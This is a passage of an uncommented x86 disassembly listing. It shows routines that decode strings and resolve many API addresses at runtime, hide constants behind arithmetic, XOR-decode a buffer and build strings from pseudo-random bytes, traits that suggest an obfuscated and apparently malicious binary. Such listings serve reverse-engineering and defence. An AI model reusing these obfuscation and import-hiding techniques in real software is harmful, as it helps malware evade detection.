push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_421CEB
; ---------------------------------------------------------------------------
loc_421CC3: ; CODE XREF: .data:00421CB1�j
push 10013830h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_421CE3
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_421CEB
; ---------------------------------------------------------------------------
loc_421CE3: ; CODE XREF: .data:00421CD1�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_421CEB: ; CODE XREF: .data:00421CA1�j
; .data:00421CC1�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
dw 1B8h
dd 0C2800040h
db 18h, 0
; =============== S U B R O U T I N E =======================================
sub_421CFA proc near ; CODE XREF: .data:0041F741�p
push edi
push 1001310Ch
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:1001215Ch, eax
test eax, eax
jnz short loc_421D2D
push 100130FEh
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:1001215Ch, eax
loc_421D2D: ; CODE XREF: sub_421CFA+1A�j
push 100130EBh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1001160Ch, eax
push 100130D8h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10010648h, eax
push 100130C6h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000E614h, eax
push 100130B5h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000F224h, eax
push 100130A1h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000C050h, eax
push 10013090h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000D010h, eax
push 10013079h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000E5F0h, eax
push 1001306Ah
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000F368h, eax
push 1001305Dh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000C004h, eax
push 1001304Bh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011628h, eax
push 1001303Ah
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011650h, eax
push 10013028h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011BA4h, eax
push 10013019h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000F220h, eax
push 1001300Ch
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011620h, eax
push 10012FFDh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011640h, eax
push 10012FEFh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000C040h, eax
push 10012FDDh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000E0DCh, eax
push 10012FCDh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000C014h, eax
push 10012FC1h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000EA40h, eax
push 10012FB5h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011604h, eax
push 10012FA3h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000E5F8h, eax
push 10012F91h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011654h, eax
push 10012F83h
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011658h, eax
push 10012F6Fh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1001177Ch, eax
push 10012F5Eh
call sub_41E33D
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:10011638h, eax
push 10012F48h
call sub_41E33D
add esp, 68h
push eax
push dword ptr ds:1001215Ch
call dword ptr ds:1000E1F8h
mov ds:1000C048h, eax
pop edi
retn
sub_421CFA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
movsx eax, word ptr ds:100120A0h
sub eax, 5
cmp ds:10011784h, eax
jbe short loc_42202A
push 10011784h
call dword ptr ds:1000C010h
loc_42202A: ; CODE XREF: .data:0042201D�j
mov eax, ds:10011784h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_422033 proc near ; CODE XREF: .data:0041F750�p
push edi
push 10012F38h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:10012168h, eax
test eax, eax
jnz short loc_422066
push 10012F28h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:10012168h, eax
loc_422066: ; CODE XREF: sub_422033+1A�j
push 10012F16h
call sub_41E33D
push eax
push dword ptr ds:10012168h
call dword ptr ds:1000E1F8h
mov ds:1000C044h, eax
push 10012F05h
call sub_41E33D
push eax
push dword ptr ds:10012168h
call dword ptr ds:1000E1F8h
mov ds:10011BA0h, eax
push 10012EF5h
call sub_41E33D
push eax
push dword ptr ds:10012168h
call dword ptr ds:1000E1F8h
mov ds:10011BB0h, eax
push 10012EE6h
call sub_41E33D
push eax
push dword ptr ds:10012168h
call dword ptr ds:1000E1F8h
mov ds:1000C038h, eax
push 10012ED6h
call sub_41E33D
add esp, 14h
push eax
push dword ptr ds:10012168h
call dword ptr ds:1000E1F8h
mov ds:1000F254h, eax
pop edi
retn
sub_422033 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+8]
push 10007237h
push dword ptr fs:0
mov fs:0, esp
push 10012ECEh
call sub_41E33D
push dword ptr [edi]
push eax
lea esi, [ebp-0Ah]
push esi
call dword ptr ds:10011634h
add esp, 10h
loc_42212D: ; CODE XREF: .data:00422157�j
push 0
push dword ptr [edi]
lea eax, [ebp-0Ah]
push eax
call sub_41C388
movsx eax, word ptr ds:100120E0h
movsx edx, word ptr ds:10012108h
add eax, edx
sub eax, 0Dh
push eax
call dword ptr ds:10011630h
add esp, 10h
jmp short loc_42212D
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 0C9h
db 0C2h, 4, 0
; =============== S U B R O U T I N E =======================================
sub_42215F proc near ; CODE XREF: .data:0041F764�p
push edi
push 10012EBEh
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:10012178h, eax
test eax, eax
jnz short loc_422192
push 10012EAEh
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:10012178h, eax
loc_422192: ; CODE XREF: sub_42215F+1A�j
push 10012E9Dh
call sub_41E33D
push eax
push dword ptr ds:10012178h
call dword ptr ds:1000E1F8h
mov ds:1000E5ECh, eax
push 10012E89h
call sub_41E33D
push eax
push dword ptr ds:10012178h
call dword ptr ds:1000E1F8h
mov ds:1000C03Ch, eax
push 10012E7Ah
call sub_41E33D
add esp, 0Ch
push eax
push dword ptr ds:10012178h
call dword ptr ds:1000E1F8h
mov ds:10011618h, eax
pop edi
retn
sub_42215F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4221EB proc near ; CODE XREF: sub_420BEA+D0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 100121D0h
push 10012190h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_424635
pop ebp
retn
sub_4221EB endp
; ---------------------------------------------------------------------------
db 0A1h, 10h, 21h
dd 0BF0F1001h, 120E415h, 83D00110h, 0FF500DE8h, 1166015h
db 10h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42221E proc near ; CODE XREF: sub_41BEF1+2E2�p
; sub_41DD73+1BC�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_42507D
push ebx
push esi
push edi
push 10012A4Bh
call sub_41E33D
push eax
lea edi, [ebp+var_FFF]
push edi
call dword ptr ds:10011634h
add esp, 0Ch
mov eax, ds:10012094h
mov esi, eax
add esi, ds:100120BCh
dec esi
jmp short loc_422270
; ---------------------------------------------------------------------------
loc_422259: ; CODE XREF: sub_42221E+58�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_42226F
mov eax, ds:100120ECh
mov [ebp+esi+var_FFF], al
loc_42226F: ; CODE XREF: sub_42221E+43�j
inc esi
loc_422270: ; CODE XREF: sub_42221E+39�j
cmp esi, 0FFFh
jb short loc_422259
mov eax, ds:100120ECh
movsx edx, word ptr ds:100120F0h
add eax, edx
sub eax, 5
mov [ebp+var_1004], eax
mov eax, ds:10012128h
movsx edx, word ptr ds:1001211Ch
mov ebx, eax
add ebx, edx
sub ebx, 2
cmp [ebp+arg_0], 0
jnz short loc_422308
loc_4222A8: ; CODE XREF: sub_42221E+E8�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_4222CA
lea eax, [ebp+ebx+var_FFF]
push eax
push 10011670h
call sub_42509D
jmp loc_42254B
; ---------------------------------------------------------------------------
loc_4222CA: ; CODE XREF: sub_42221E+93�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4222D4: ; CODE XREF: sub_42221E+BB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4222D4
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
movsx edx, word ptr ds:1001211Ch
add edx, ds:100120ACh
sub edx, 4
cmp eax, edx
jz loc_42254B
jmp short loc_4222A8
; ---------------------------------------------------------------------------
loc_422308: ; CODE XREF: sub_42221E+88�j
mov eax, ds:10012210h
mov [ebp+var_1008], eax
mov eax, ds:100120D0h
mov edx, [ebp+arg_0]
mov ecx, ds:100120C0h
sub ecx, 3
mov [edx+eax], cl
movsx eax, word ptr ds:10012120h
mov ebx, eax
add ebx, ds:10012124h
sub ebx, 0Ah
movsx eax, word ptr ds:1001214Ch
movsx edx, word ptr ds:100120B8h
add eax, edx
sub eax, 6
mov [ebp+var_1004], eax
loc_422352: ; CODE XREF: sub_42221E+305�j
push 10012A40h
call sub_41E33D
push eax
lea edi, [ebp+var_110B]
push edi
call sub_42509D
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call dword ptr ds:1000C020h
add esp, 0Ch
call dword ptr ds:10011BACh
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, ds:100120ACh
cmp edx, eax
jnb loc_42247A
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_422550
mov eax, ds:10012094h
movsx edx, word ptr ds:10012118h
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_41FCE7
add esp, 14h
movsx edi, word ptr ds:10012090h
add edi, 0FFFDh
cmp eax, edi
jnz short loc_422410
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
push 10012A3Bh
call sub_41E33D
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 14h
loc_422410: ; CODE XREF: sub_42221E+1C9�j
mov eax, ds:10012138h
dec eax
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_41FCE7
add esp, 0Ch
mov edi, ds:10012144h
add edi, 0FFFFh
cmp eax, edi
jnz short loc_422474
push 10012A30h
call sub_41E33D
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
push 10012A2Bh
call sub_41E33D
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 20h
loc_422474: ; CODE XREF: sub_42221E+219�j
inc [ebp+var_1008]
loc_42247A: ; CODE XREF: sub_42221E+17E�j
push [ebp+var_1004]
call sub_41E505
pop ecx
mov [ebp+var_100C], eax
mov ecx, ds:10012148h
cmp eax, ecx
jnb short loc_4224EA
movsx eax, word ptr ds:1001212Ch
sub eax, 3
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_41FCE7
add esp, 0Ch
mov edi, ds:100120DCh
add edi, 0FFF7h
cmp eax, edi
jnz short loc_4224EA
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
push 10012A26h
call sub_41E33D
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 14h
loc_4224EA: ; CODE XREF: sub_42221E+276�j
; sub_42221E+2A3�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4224F4: ; CODE XREF: sub_42221E+2DB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4224F4
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
movsx edx, word ptr ds:100120E0h
movsx ecx, word ptr ds:1001211Ch
add edx, ecx
sub edx, 0Ah
cmp eax, edx
jnz loc_422352
push 10012A21h
call sub_41E33D
push eax
push [ebp+arg_0]
call dword ptr ds:1000C020h
add esp, 0Ch
mov eax, [ebp+var_1008]
mov ds:10012210h, eax
loc_42254B: ; CODE XREF: sub_42221E+A7�j
; sub_42221E+E2�j
pop edi
pop esi
pop ebx
leave
retn
sub_42221E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422550 proc near ; CODE XREF: sub_41BEF1+38C�p
; sub_41DD73+217�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
mov edi, ds:10012100h
add edi, 1Ch
mov eax, esi
test eax, eax
jge short loc_422571
add eax, 0FFh
loc_422571: ; CODE XREF: sub_422550+1A�j
sar eax, 8
movsx ebx, word ptr ds:10012140h
add ebx, 2
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_8], edi
mov edi, ds:10012144h
add edi, 15h
mov eax, esi
test eax, eax
jge short loc_42259C
add eax, 0FFh
loc_42259C: ; CODE XREF: sub_422550+45�j
sar eax, 8
mov ebx, ds:10012100h
add ebx, 0Eh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
mov edi, ds:100120C4h
add edi, 1Dh
mov eax, esi
test eax, eax
jge short loc_4225C6
add eax, 0FFFFh
loc_4225C6: ; CODE XREF: sub_422550+6F�j
sar eax, 10h
movsx ebx, word ptr ds:100120F0h
add ebx, 12h
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_41B893
mov ebx, eax
mov [ebp+var_1], bl
mov eax, ds:100120D4h
add eax, 0Ch
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_420DC2
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_41B893
mov ebx, eax
mov [ebp+var_12], bl
movsx eax, word ptr ds:10012118h
add eax, 68h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_420DC2
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_41B893
mov ebx, eax
mov [ebp+var_14], bl
movsx eax, word ptr ds:10012140h
add eax, 28h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_420DC2
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_41B893
mov ebx, eax
mov [ebp+var_16], bl
mov eax, ds:100120D0h
add eax, 49h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_420DC2
mov ebx, eax
mov [ebp+var_17], bl
mov eax, ds:10012148h
lea eax, [eax+eax+3Fh]
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_41B893
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mul dword ptr ds:100120ACh
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_422737
push 10012A07h
call sub_41E33D
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10011634h
add esp, 30h
jmp short loc_42277B
; ---------------------------------------------------------------------------
loc_422737: ; CODE XREF: sub_422550+19F�j
push 100129ECh
call sub_41E33D
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call dword ptr ds:10011634h
add esp, 30h
loc_42277B: ; CODE XREF: sub_422550+1E5�j
pop edi
pop esi
pop ebx
leave
retn
sub_422550 endp
; =============== S U B R O U T I N E =======================================
sub_422780 proc near ; CODE XREF: .data:004202F8�p
push edi
push 100129DEh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011660h, eax
push 100129D6h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000D00Ch, eax
push 100129C2h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000E5E8h, eax
push 100129B2h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000F244h, eax
push 100129A3h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011788h, eax
push 10012994h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000C008h, eax
push 10012982h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011B9Ch, eax
push 10012975h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011B8Ch, eax
push 10012966h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10010650h, eax
push 10012957h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011624h, eax
push 1001294Bh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000C000h, eax
push 10012940h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000E0E0h, eax
push 10012929h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000C00Ch, eax
push 10012912h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1001163Ch, eax
push 100128FCh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011608h, eax
push 100128ECh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000C034h, eax
push 100128E0h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000C028h, eax
push 100128D0h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000F248h, eax
push 100128C1h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10010630h, eax
push 100128B3h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000EA34h, eax
push 100128A6h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000E618h, eax
push 10012895h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000F25Ch, eax
push 10012884h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000C02Ch, eax
push 10012874h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011770h, eax
push 10012862h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000F258h, eax
push 10012851h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000D004h, eax
push 10012844h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000E608h, eax
push 10012833h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011664h, eax
push 1001281Eh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1001164Ch, eax
push 1001280Eh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000D000h, eax
push 100127F9h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000E0D4h, eax
push 100127ECh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000F364h, eax
push 100127DCh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1001161Ch, eax
push 100127CEh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10010644h, eax
push 100127B8h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10010638h, eax
push 100127A1h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000E5FCh, eax
push 10012789h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000EA3Ch, eax
push 10012771h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000C010h, eax
push 10012758h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011614h, eax
push 10012745h
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011780h, eax
push 1001272Dh
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011778h, eax
push 1001271Ch
call sub_41E33D
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:10011B98h, eax
push 1001270Ah
call sub_41E33D
add esp, 0ACh
push eax
push dword ptr ds:10012154h
call dword ptr ds:1000E1F8h
mov ds:1000E5F4h, eax
pop edi
retn
sub_422780 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 18C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422C45 proc near ; CODE XREF: sub_41A910+21E�p
; sub_41A910+235�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10012150h, 0
jnz short loc_422C6D
push 10011BC0h
call dword ptr ds:1000D008h
mov dword ptr ds:10012150h, 1
loc_422C6D: ; CODE XREF: sub_422C45+11�j
movsx esi, word ptr ds:100120B8h
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
movsx edx, word ptr ds:100120F4h
mov ecx, ds:100120D4h
lea edx, [edx+ecx+2]
imul ebx, edx
lea esi, [esi+ebx+4]
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, ds:10012134h
movsx ecx, word ptr ds:100120A0h
add edx, ecx
sub edx, 3
cmp eax, edx
jz loc_422D5E
push 10011BC0h
call dword ptr ds:1001165Ch
movsx eax, word ptr ds:100120B4h
mov edx, ds:100120D0h
lea eax, [eax+edx+1]
mov [ebp+var_2], ax
jmp short loc_422D0F
; ---------------------------------------------------------------------------
loc_422CE2: ; CODE XREF: sub_422C45+D4�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, ds:10012148h
movsx ecx, word ptr ds:10012114h
add edx, ecx
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_422D0F: ; CODE XREF: sub_422C45+9B�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_422CE2
mov eax, ds:100120A8h
sub eax, 4
movsx edx, word ptr ds:100120E0h
movsx ecx, word ptr ds:100120B4h
add edx, ecx
sub edx, 0Dh
mov [edi+eax], dl
mov eax, ds:10012134h
sub eax, 2
mov edx, ds:100120B0h
add edx, ds:1001209Ch
sub edx, 8
mov [edi+eax], dl
push 10011BC0h
call dword ptr ds:1001064Ch
loc_422D5E: ; CODE XREF: sub_422C45+75�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_422C45 endp
; ---------------------------------------------------------------------------
dw 1B8h
dd 0C2800040h
db 8, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D6E proc near ; CODE XREF: sub_41BB32+1C5�p
var_3200C = dword ptr -3200Ch
var_32008 = dword ptr -32008h
var_32003 = byte ptr -32003h
var_32002 = byte ptr -32002h
var_32001 = byte ptr -32001h
var_31FFE = byte ptr -31FFEh
var_31F58 = dword ptr -31F58h
var_31F54 = dword ptr -31F54h
var_31F50 = dword ptr -31F50h
var_31F4C = dword ptr -31F4Ch
var_31F48 = dword ptr -31F48h
var_31F44 = dword ptr -31F44h
var_31F40 = dword ptr -31F40h
var_31F3C = dword ptr -31F3Ch
var_31F38 = dword ptr -31F38h
var_31F34 = dword ptr -31F34h
var_31F30 = dword ptr -31F30h
var_31F2C = dword ptr -31F2Ch
var_31F28 = dword ptr -31F28h
var_31F24 = dword ptr -31F24h
var_31F20 = dword ptr -31F20h
var_31F1C = dword ptr -31F1Ch
var_31F18 = dword ptr -31F18h
var_31F14 = dword ptr -31F14h
var_31F10 = dword ptr -31F10h
var_31F0C = dword ptr -31F0Ch
var_31F08 = dword ptr -31F08h
var_31F04 = dword ptr -31F04h
var_31F00 = dword ptr -31F00h
var_31EFC = dword ptr -31EFCh
var_31EF8 = dword ptr -31EF8h
var_31EF4 = dword ptr -31EF4h
var_31EF0 = dword ptr -31EF0h
var_31EEC = dword ptr -31EECh
var_31EE8 = dword ptr -31EE8h
var_31EE4 = dword ptr -31EE4h
var_31EE0 = dword ptr -31EE0h
var_31EDC = dword ptr -31EDCh
var_31ED8 = dword ptr -31ED8h
var_31ED4 = dword ptr -31ED4h
var_31ED0 = byte ptr -31ED0h
var_31EC3 = byte ptr -31EC3h
var_1190 = dword ptr -1190h
var_118C = dword ptr -118Ch
var_1188 = dword ptr -1188h
var_1184 = dword ptr -1184h
var_1180 = dword ptr -1180h
var_117C = dword ptr -117Ch
var_1178 = dword ptr -1178h
var_1174 = dword ptr -1174h
var_116F = byte ptr -116Fh
var_1070 = dword ptr -1070h
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = dword ptr -105Ch
var_1058 = dword ptr -1058h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_850 = dword ptr -850h
var_84C = dword ptr -84Ch
var_848 = dword ptr -848h
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
